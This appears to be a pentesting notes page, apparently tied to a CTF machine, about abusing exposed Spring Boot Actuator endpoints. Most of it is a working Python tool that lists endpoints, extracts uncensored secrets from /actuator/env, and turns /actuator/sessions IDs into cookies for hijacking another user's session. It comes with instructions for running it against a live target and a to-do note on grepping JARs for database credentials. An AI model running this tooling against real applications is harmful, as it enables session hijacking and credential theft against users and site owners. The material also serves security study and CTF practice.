Spring Boot Actuators

cozyhosting spring-actuators

Spring Boot Actuator is a Spring Boot module for monitoring and managing applications. Spring Boot applications can be deployed to several servers, such as Apache Tomcat.

It is commonly exposed at the /actuator endpoint. Querying this endpoint returns a list (as a JSON `_links` object) of all enabled endpoints.

Most endpoints return censored (sanitized) data: values of properties whose names look sensitive (password, secret, key, token, credentials, ...) are replaced by `******`, and since Spring Boot 3 every value is hidden unless `management.endpoint.env.show-values` is enabled.

  • /actuator/mappings: lists the application's request mappings, useful to find URIs that are not linked anywhere
  • /actuator/env: configuration properties with sensitive values censored
  • ...

/actuator/sessions lists the existing HTTP sessions (it is only available when the application uses Spring Session). Querying /actuator/sessions?username=<user> returns that user's session IDs, and placing one of them in the session cookie lets us steal (hijack) the other user's session.
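The enumeration steps above, as an added example that is not part of the original page: it parses the /actuator discovery document, pulls the non-censored hits out of /actuator/env, and turns the live session IDs from /actuator/sessions into cookie candidates. The three JSON documents are constructed samples in the Spring Boot 2.x layout, the host `target` is made up, and the cookie name `SESSION` is an assumption (Spring Session's default; the application may use `JSESSIONID` instead).

```python
"""Triage Spring Boot Actuator responses (added example, not the page's own tooling)."""
import base64
import json
from urllib.parse import urlparse
from urllib.request import Request, urlopen

REDACTED = "******"  # placeholder Spring Boot substitutes for sanitized values

# Constructed sample responses modelled on the Spring Boot 2.x JSON layouts (host is made up).
DISCOVERY = json.dumps({"_links": {
    "self": {"href": "http://target/actuator", "templated": False},
    "env": {"href": "http://target/actuator/env", "templated": False},
    "env-toMatch": {"href": "http://target/actuator/env/{toMatch}", "templated": True},
    "mappings": {"href": "http://target/actuator/mappings", "templated": False},
    "sessions": {"href": "http://target/actuator/sessions", "templated": False},
}})

ENV = json.dumps({"activeProfiles": [], "propertySources": [
    {"name": "systemProperties", "properties": {"java.version": {"value": "17"}}},
    {"name": "Config resource 'class path resource [application.properties]'",
     "properties": {
         "spring.datasource.url": {"value": "jdbc:postgresql://db:5432/app"},
         "spring.datasource.username": {"value": "app"},
         "spring.datasource.password": {"value": "******"},  # censored by Spring Boot
         "server.port": {"value": "8080"},
     }},
]})

SESSIONS = json.dumps({"sessions": [  # shape of GET /actuator/sessions?username=<user>
    {"id": "1A2B3C4D5E6F7A8B9C0D", "attributeNames": ["SPRING_SECURITY_CONTEXT"],
     "creationTime": "2024-01-01T00:00:00Z", "lastAccessedTime": "2024-01-01T00:05:00Z",
     "maxInactiveInterval": 1800, "expired": False},
    {"id": "DEADBEEF", "attributeNames": [], "creationTime": "2023-12-31T00:00:00Z",
     "lastAccessedTime": "2023-12-31T00:30:00Z", "maxInactiveInterval": 1800, "expired": True},
]})


def list_endpoints(discovery_json):
    """Concrete (non-templated) endpoint paths from the /actuator discovery document."""
    links = json.loads(discovery_json).get("_links", {})
    return sorted(urlparse(link["href"]).path for name, link in links.items()
                  if name != "self" and not link.get("templated"))


def interesting_env(env_json, keywords=("password", "secret", "key", "token",
                                        "credential", "datasource")):
    """Property name -> value for keyword hits whose value was NOT censored.
    Spring Boot replaces sanitized values with '******', so those are dropped."""
    hits = {}
    for source in json.loads(env_json).get("propertySources", []):
        for name, prop in source.get("properties", {}).items():
            if any(k in name.lower() for k in keywords) and prop.get("value") != REDACTED:
                hits[name] = prop.get("value")
    return hits


def session_cookies(sessions_json, cookie_name="SESSION"):
    """(session id, raw Cookie header, base64 Cookie header) for every non-expired session.
    Spring Session's DefaultCookieSerializer base64-encodes the id in the cookie by default,
    so both forms are produced; try the raw one if the app uses plain JSESSIONID."""
    out = []
    for s in json.loads(sessions_json).get("sessions", []):
        if s.get("expired"):
            continue
        sid = s["id"]
        b64 = base64.b64encode(sid.encode()).decode()
        out.append((sid, f"{cookie_name}={sid}", f"{cookie_name}={b64}"))
    return out


def fetch_json(url, cookie=None, timeout=10):
    """GET a document from a live target (not used by the offline demo below)."""
    req = Request(url, headers={"Accept": "application/json"})
    if cookie:
        req.add_header("Cookie", cookie)
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    print("endpoints:", list_endpoints(DISCOVERY))
    print("leaked env:", interesting_env(ENV))
    for sid, raw, b64 in session_cookies(SESSIONS):
        print("session", sid, "->", raw, "or", b64)
```

Against a real target, replace the constants with `fetch_json("http://target/actuator")`, `fetch_json(".../actuator/env")` and `fetch_json(".../actuator/sessions?username=<user>")`, then replay a cookie candidate with `fetch_json(".../", cookie=...)` and check whether the response is the other user's page.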

👻 To-do 👻

Stuff that I found but have never read or used yet.

  • See also: JAR Reverse Engineering
  • /beans.xml (Spring configuration metadata)
  • In an extracted JAR: grep datasource BOOT-INF/classes/application.properties (database credentials)
  • Spring is easy to recognize from its 404 page (the Whitelabel Error Page, or its JSON error format)
  • /actuator is the Spring Boot 2.x prefix; in 1.x the endpoints sit at the root (e.g. /env) and are not censored when there is no database configuration